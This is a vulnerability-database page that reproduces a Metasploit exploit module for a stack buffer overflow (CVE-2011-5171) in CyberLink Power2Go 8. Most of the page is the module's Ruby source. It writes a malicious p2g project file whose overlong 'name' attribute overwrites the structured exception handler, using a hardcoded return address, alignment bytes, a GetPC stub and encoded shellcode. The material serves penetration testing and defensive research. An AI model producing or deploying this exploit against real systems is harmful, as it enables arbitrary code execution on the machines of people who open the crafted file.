Lucene search
K

CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit

🗓️ 13 Apr 2012 01:07:36Reported by modpr0be <[email protected]>, mr_me <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

CyberLink Power2Go Buffer Overflow Exploit - Opens malformed p2g file with long 'name' attribute, triggers stack buffer overflow, overwrites structured exception handler record

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5171
9 Dec 201100:00
circl
Check Point Advisories
Cyberlink Power2Go p2g Project Buffer Overflow - Ver2 (CVE-2011-5171)
31 Mar 201400:00
checkpoint_advisories
CVE
CVE-2011-5171
15 Sep 201217:00
cve
Cvelist
CVE-2011-5171
15 Sep 201217:00
cvelist
NVD
CVE-2011-5171
15 Sep 201217:55
nvd
Prion
Stack overflow
15 Sep 201217:55
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit',
      'Description'     => %q{
          This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
        The vulnerability is triggered when opening a malformed p2g file containing an overly
        long string in the 'name' attribute of the file element. This results in overwriting a
        structured exception handler record.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
          'mr_me <steventhomasseeley[at]gmail.com>' # msf module
        ],
      'References'      =>
        [
          ['CVE', '2011-5171'],
          ['BID', '50997'],
          ['OSVDB', '77600'],
          ['EDB', '18220'],
          ['US-CERT-VU', '158003']
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'         =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00"
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
          [ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]
        ],
      'DisclosureDate'  => '2011-09-12',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output filename.', 'msf.p2g'])
      ])
  end

  def get_payload(hunter)

    [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
      enc = framework.encoders.create(name)
      if name =~ /unicode/
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
      else
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
      end
      # NOTE: we already eliminated badchars
      hunter = enc.encode(hunter, nil, nil, platform)
      if name =~/alpha/
        #insert getpc_stub & align EDX, unicode encoder friendly.
        #Hardcoded stub is not an issue here because it gets encoded anyway
        getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
        hunter = getpc_stub + hunter
      end
    }

    return hunter
  end

  def exploit

    title = rand_text_alpha(10)
    buffer =  ""
    buffer << rand_text_alpha(778)
    buffer << "\x58\x28"        # nseh
    buffer << target['Ret']     # seh
    buffer << "\x5f\x73" * 15   # pop edi/add [ebx],dh (after byte alignment)
    buffer << "\x58\x73"        # pop eax/add [ebx],dh (after byte alignment)
    buffer << "\x40\x73" * 3    # inc eax/add [ebx],dh (after byte alignment)
    buffer << "\x40"            # inc eax
    buffer << "\x73\x42" * 337  # add [ebx],dh/pop edx (after byte alignment)
    buffer << "\x73"            # add [ebx],dh (after byte alignment)
    buffer << get_payload(payload.encoded)

    p2g_data = <<-EOS
    <Project magic="#{title}" version="101">
    <Information />
      <Compilation>
        <DataDisc>
          <File name="#{buffer}" />
        </DataDisc>
      </Compilation>
    </Project>
    EOS

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(p2g_data)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation